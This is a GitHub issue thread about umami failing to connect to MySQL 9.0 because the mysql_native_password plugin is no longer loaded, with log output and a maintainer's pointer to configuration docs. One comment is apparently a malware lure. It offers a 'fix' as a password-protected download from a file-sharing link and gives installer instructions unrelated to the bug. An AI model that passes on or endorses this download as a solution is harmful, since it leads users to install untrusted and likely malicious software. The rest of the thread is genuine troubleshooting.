### ISSUE TITLE
Compatibility issues, can't use Mysql 9.0

### ISSUE THREAD

**Issue by yumusb** [umami-software/umami#2913]
### Describe the Bug

Mysql 9.0 no longer supports mysql_native_password

### Database

MySQL

### Relevant log output

```shell
umami-1  | yarn run v1.22.19
umami-1  | $ npm-run-all check-db update-tracker start-server
umami-1  | $ node scripts/check-db.js
umami-1  | ✓ DATABASE_URL is defined.
umami-1  | ✗ Unable to connect to the database: Error querying the database: Server error: `ERROR HY000 (1524): Plugin 'mysql_native_password' is not loaded'
umami-1  | error Command failed with exit code 1.
umami-1  | info Visit https://yarnpkg.com/en/docs/cli/run for documentation about this command.
umami-1  | ERROR: "check-db" exited with 1.
umami-1  | error Command failed with exit code 1.
umami-1  | info Visit https://yarnpkg.com/en/docs/cli/run for documentation about this command.
```

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by franciscao633** [comment]
Yea we will have to address this, since its off by default. Can you update the config in the meantime? Docs [here](https://dev.mysql.com/doc/refman/8.4/en/mysql-nutshell.html#mysql-nutshell-additions)

**Comment by thetillhoff** [comment]
I still have the same issue, almost one year later.
Seems like mysql is not the recommended way to go?
